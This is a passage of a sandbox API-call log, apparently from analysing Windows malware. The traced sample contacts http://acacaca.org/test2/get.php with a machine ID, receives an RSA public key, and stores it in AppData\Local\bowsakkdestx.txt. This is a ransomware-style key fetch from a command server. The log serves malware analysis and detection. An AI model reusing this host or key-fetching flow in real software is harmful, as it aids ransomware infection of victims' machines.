dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0181.307] GetFileType (hFile=0x4f0) returned 0x1 [0181.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6734e8 | out: hHeap=0x620000) returned 1 [0181.320] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x922a418 | out: lpNewFilePointer=0x0) returned 1 [0181.320] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x922a410 | out: lpNewFilePointer=0x0) returned 1 [0181.320] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x92293f4 | out: lpNewFilePointer=0x0) returned 1 [0181.321] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x92293ec | out: lpNewFilePointer=0x0) returned 1 [0181.321] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x922a434 | out: lpNewFilePointer=0x0) returned 1 [0181.321] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x922a42c | out: lpNewFilePointer=0x0) returned 1 [0181.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x2d0c9a0 [0181.321] ReadFile (in: hFile=0x4f0, lpBuffer=0x2d0c9a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x922a3c4, lpOverlapped=0x0 | out: lpBuffer=0x2d0c9a0*, lpNumberOfBytesRead=0x922a3c4*=0x22d, lpOverlapped=0x0) returned 1 [0181.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c9a0 | out: hHeap=0x620000) returned 1 [0181.353] CloseHandle (hObject=0x4f0) returned 1 [0181.353] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x922a670 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0181.353] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0181.353] DeleteFileA (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt")) returned 1 [0181.362] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x922a4e4 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0181.362] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0181.362] AreFileApisANSI () returned 1 [0181.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x922a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0181.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x6734e8 [0181.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x922a4e4, cbMultiByte=-1, lpWideCharStr=0x6734e8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0181.362] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x922a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.363] GetLastError () returned 0x2 [0181.363] GetLastError () returned 0x2 [0181.363] SetLastError (dwErrCode=0x2) [0181.363] GetLastError () returned 0x2 [0181.363] SetLastError (dwErrCode=0x2) [0181.363] GetLastError () returned 0x2 [0181.363] SetLastError (dwErrCode=0x2) [0181.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6734e8 | out: hHeap=0x620000) returned 1 [0181.364] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0181.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2cca9d0 [0181.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x669238 [0181.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2d0c9a0 [0181.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x669238, cbMultiByte=-1, lpWideCharStr=0x2d0c9a0, cchWideChar=1056 | out: lpWideCharStr="DEC2E953FC80DE582D412ECFEAA51D7B") returned 33 [0181.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2d0d1e8 [0181.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c9a0 | out: hHeap=0x620000) returned 1 [0181.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669238 | out: hHeap=0x620000) returned 1 [0181.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2d0da40 [0181.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cca9d0 | out: hHeap=0x620000) returned 1 [0181.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d1e8 | out: hHeap=0x620000) returned 1 [0181.366] lstrcpyW (in: lpString1=0x922af78, lpString2="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B" | out: lpString1="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B") returned="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B" [0181.366] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://acacaca.org/test2/get.php?pid=DEC2E953FC80DE582D412ECFEAA51D7B", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0181.789] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x922a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x922a604 | out: lpBuffer=0x922a778*, lpdwNumberOfBytesRead=0x922a604*=0x22d) returned 1 [0181.791] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x922a670 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0181.791] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0181.791] AreFileApisANSI () returned 1 [0181.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x922a670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0181.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0181.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x922a670, cbMultiByte=-1, lpWideCharStr=0x673558, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0181.791] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x922a47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e4 [0181.792] GetFileType (hFile=0x2e4) returned 0x1 [0181.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0181.792] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 557 [0181.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x2d0e2d8 [0181.793] WriteFile (in: hFile=0x2e4, lpBuffer=0x9229118*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0x9228a44, lpOverlapped=0x0 | out: lpBuffer=0x9229118*, lpNumberOfBytesWritten=0x9228a44*=0x22d, lpOverlapped=0x0) returned 1 [0181.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0e2d8 | out: hHeap=0x620000) returned 1 [0181.794] CloseHandle (hObject=0x2e4) returned 1 [0181.795] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0181.796] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0181.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0da40 | out: hHeap=0x620000) returned 1 [0181.797] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0181.797] lstrcpyA (in: lpString1=0x922ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0181.797] lstrcpyA (in: lpString1=0x922a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0181.797] lstrlenA (lpString="-----BEGIN PUBLIC 